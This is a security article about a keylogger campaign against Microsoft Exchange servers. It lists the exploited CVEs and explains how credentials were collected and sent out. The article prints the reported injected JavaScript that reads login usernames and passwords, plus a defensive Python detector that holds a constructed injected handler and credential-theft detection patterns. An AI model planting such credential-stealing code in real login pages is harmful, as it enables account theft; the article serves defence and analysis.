A recent, significant cyberattack campaign has targeted over 70 Microsoft Exchange servers across 26 countries, with the aim of stealing user credentials using sophisticated keylogger malware. The attacks have been documented by cybersecurity researchers, particularly Positive Technologies, who identified two main types of keylogger code injected into the Outlook login pages of compromised servers.
Attack Details and Mechanism
The campaign, which has been active since at least 2021, has impacted at least 65 victims across 26 countries, including government agencies, banks, IT companies, and educational institutions. The attacks initially focused on organizations in Africa and the Middle East but have since expanded globally. The attack exploits known vulnerabilities in Microsoft Exchange Server, including ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and other critical flaws (e.g., CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-31206, CVE-2014-4078, CVE-2020-0796).
The malicious JavaScript keylogger code is inserted into the server’s login page, often inside the clkLgn() function, and captures usernames and passwords as users log in. The reported code assembles the stolen credentials into a payload like this:
// Builds the credential payload (date, username, password), which is then written to a file on the server or sent to the attackers
var ObjectData = "ObjectType=" + escape(
new Date().toLocaleDateString() + "\t" +
document.getElementById("username").value + "\t" +
document.getElementById("password").value
) + "&uin=" + Math.random().toString(16).substring(2);
Data Exfiltration
There are two primary methods of data exfiltration. In the first, credentials are written to a file on the compromised server that is reachable over the internet, allowing attackers to retrieve the data at their convenience. In the second, seen in other variants, the collected credentials are sent directly to an external server controlled by the attackers.
The keyloggers are designed to bypass security controls and blend in with legitimate server activity. As a result, the attackers maintained persistence on the compromised systems and remained undetected for months.
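As an added illustration (not code from the report or from Positive Technologies), the following Python script turns the behaviours described above into detection heuristics for the clkLgn() handler of a logon page: it flags script that reads the password field's value, serialises credentials with escape(), and hands the payload off. The two page samples and the POST path are constructed stand-ins, not real OWA code.

```python
import re

# Heuristics for the behaviour the report describes: the injected handler reads
# the credential fields, serialises them (escape()) into a payload and hands it
# off to an attacker host or to a server-side handler that writes a file.
PATTERNS = {
    "password_field_read": re.compile(r'getElementById\(\s*["\']password["\']\s*\)\s*\.value'),
    "credentials_serialised": re.compile(r'\b(escape|encodeURIComponent|btoa)\s*\('),
    "payload_sent": re.compile(r'XMLHttpRequest|\bfetch\s*\(|\.send\s*\(|new\s+Image\s*\(|sendBeacon'),
}

def function_body(js, name):
    """Return the brace-delimited body of `function name(...) {...}`, or None.
    Plain brace matching; braces inside string literals are not special-cased."""
    m = re.search(r'function\s+' + re.escape(name) + r'\s*\([^)]*\)\s*\{', js)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(js) and depth:
        depth += {"{": 1, "}": -1}.get(js[i], 0)
        i += 1
    return js[m.end():i - 1] if depth == 0 else None

def scan_logon_script(js):
    """Scan clkLgn() (falling back to the whole script when it is absent) and
    return the labels of every pattern that matches, in PATTERNS order."""
    target = function_body(js, "clkLgn") or js
    return [label for label, pat in PATTERNS.items() if pat.search(target)]

def verdict(js):
    hits = scan_logon_script(js)
    # A logon page's own script has no reason to read the password field's
    # value; that single indicator is treated as decisive here (an assumption).
    return "SUSPICIOUS: " + ", ".join(hits) if "password_field_read" in hits else "clean"

# Constructed stand-in for an unmodified handler: it touches only the username.
CLEAN = """function clkLgn() {
    var sL = "lgn=" + document.getElementById("username").value;
    document.cookie = "logondata=" + sL + "; path=/";
    document.logonForm.submit();
}"""
# Constructed stand-in for an injected handler, modelled on the snippet above
# (the POST target is a placeholder, not a path from the report).
INJECTED = CLEAN.replace("    document.logonForm.submit();", """
    var ObjectData = "ObjectType=" + escape(
        document.getElementById("username").value + "\\t" +
        document.getElementById("password").value);
    var x = new XMLHttpRequest(); x.open("POST", "/PLACEHOLDER/collect"); x.send(ObjectData);
    document.logonForm.submit();""")

if __name__ == "__main__":
    print("clean ->", verdict(CLEAN), "| injected ->", verdict(INJECTED))
```

Run it against the logon page's script as served by the server, not a cached copy, and treat any hit on password_field_read as grounds for a file-integrity comparison against a known-good Exchange installation.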
Impact and Risks
The attacks have been ongoing since at least 2021, indicating a long-term, persistent threat to organizations using Microsoft Exchange. The keyloggers’ ability to store data locally or use stealthy exfiltration methods (such as DNS tunnels or Telegram bots) makes them difficult to detect with traditional security tools.
Mitigation and Recommendations
Organizations are advised to promptly patch all known vulnerabilities in Microsoft Exchange Server.